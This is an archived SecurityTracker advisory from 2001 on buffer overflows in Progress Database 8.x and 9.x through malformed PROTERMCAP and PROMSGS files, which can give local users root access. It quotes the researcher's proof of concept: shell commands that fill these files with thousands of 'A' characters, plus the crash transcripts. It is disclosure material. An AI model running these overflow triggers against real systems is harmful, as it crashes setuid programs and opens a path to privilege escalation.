SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   Progress Database Vendors:   Progress Software Corporation
Progress Database PROTERMCAP and PROMSGS Errors Let Local Users Execute Arbitrary Code with Root Level Privileges
SecurityTracker Alert ID:  1002534
SecurityTracker URL:  http://securitytracker.com/id/1002534
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 11 2001
Impact:   Execution of arbitrary code via local system, Root access via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 8.x and 9.x
Description:   A vulnerability was reported in Progress Database in its handling of the PROTERMCAP and PROMSGS files. A local user could trigger a buffer overflow in a set user id (suid) root process and gain root level access on the host.

It is reported that a malformed PROTERMCAPS or PROMSGS file can cause a memory overwrite to occur. A local user can apparently put a several few thousand characters on each line of the file to cause it to crash various set user id (suid) root executables.

An example malformed line and a demonstration exploit transcript is provided in the Source Message.

Impact:   A local user can execute arbitrary code with root level privileges.
Solution:   The vendor has reportedly released patches, but no information was provided on the patches. Contact the vendor for more information.
Vendor URL:  www.progress.com/v9/datasheets/rdbms.htm (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (DGUX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   None.


 Source Message Contents

Subject:  Progress TERM (protermcap) overflows and PROMSGS overflows


A malformed termcaps and promsgs can overwrite memory on progress
versions 8 and 9 These are two seperate issues but the below examples
show they can be used simultaneously in some cases. These have been
patched to my knowledge however I do not know the patch numbers. Put a
few thousand chars on each line you should be able to crash it most of
the suid executables and plenty of others. Please note these 
issues are not related to the other 2 posts released this week. They
were filed 
with progress under different issue tickets and were addressed in fixes
seperately.

mal termcap entry:
v7kf|version 7 key functions:\

:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....    	
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....       
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....


[root@linux dlc]# echo "v7kf|version 7 key functions:\\" > term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# export PROTERMCAP=./term  

There are a few ways to set this off... you can make use of a bug in the
PROMSGS 
here is the standard promsgs error for a bad term. 
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
 
Unable to use your terminal. Check your PROTERMCAP file. (443)
** Could not find terminal type xterm in file ./term. (146)

[root@linux dlc]# perl -e 'print "A" x 9000' > /tmp/promsgs
[root@linux dlc]# export PROMSGS=/tmp/promsgs

[root@linux dlc]# bin/pro

        @@@@@@   @@@@@@   @@@@@@@   @@@@@   @@@@@@   @@@@@@@   @@@@@   
@@@@@
       @     @  @     @  @     @  @     @  @     @  @        @     @ 
@     @
      @     @  @     @  @     @  @        @     @  @        @        @
     @@@@@@   @@@@@@   @     @  @  @@@@  @@@@@@   @@@@@     @@@@@   
@@@@@
    @        @   @    @     @  @     @  @   @    @              @       
@
   @        @    @   @     @  @     @  @    @   @        @     @  @    
@
  @        @     @  @@@@@@@   @@@@@   @     @  @@@@@@@   @@@@@    @@@@@

                           Progress Software Corporation
                                    14 Oak Park
                            Bedford, Massachusetts 01730
                                    781-280-4000

       PROGRESS is a registered trademark of Progress Software
Corporation
                              Copyright 1984-2001
                        by Progress Software Corporation
                              All Rights Reserved

PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001

Error formatting messaage 96.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
rrno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
Error formatting messaage 146.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 443
Error formatting messaage 49.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 439
Quit (core dumped)

Heres the normal error when the termcap is wrong. 
Unable to use your terminal. Check your PROTERMCAP file. (443)
** The protermcap file must contain :ce. (117)
** The protermcap file must contain :cl. (117)
** The protermcap file must contain :cm. (117)


Now for an example using just the termcap without tampering with
PROMSGS...
[root@linux dlc]# echo :ce=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :cl=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :cm=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :ce=`perl -e 'print "A" x 9000'` >> term  
[root@linux dlc]# export TERM=v7kf
[root@linux dlc]# bin/pro

 
        @@@@@@   @@@@@@   @@@@@@@   @@@@@   @@@@@@   @@@@@@@   @@@@@   
@@@@@
       @     @  @     @  @     @  @     @  @     @  @        @     @ 
@     @
      @     @  @     @  @     @  @        @     @  @        @        @
     @@@@@@   @@@@@@   @     @  @  @@@@  @@@@@@   @@@@@     @@@@@   
@@@@@
    @        @   @    @     @  @     @  @   @    @              @       
@
   @        @    @   @     @  @     @  @    @   @        @     @  @    
@
  @        @     @  @@@@@@@   @@@@@   @     @  @@@@@@@   @@@@@    @@@@@
 
                           Progress Software Corporation
                                    14 Oak Park
                            Bedford, Massachusetts 01730
                                    781-280-4000
 
       PROGRESS is a registered trademark of Progress Software
Corporation
                              Copyright 1984-2001
                        by Progress Software Corporation
                              All Rights Reserved
 
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
 
SYSTEM ERROR: strent request for more than 32K. (893)
Quit (core dumped)


It is also possible to crash suids using only the PROMSGS... I have a
patched version at the moment so I can not demonstrate. 

-KF

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC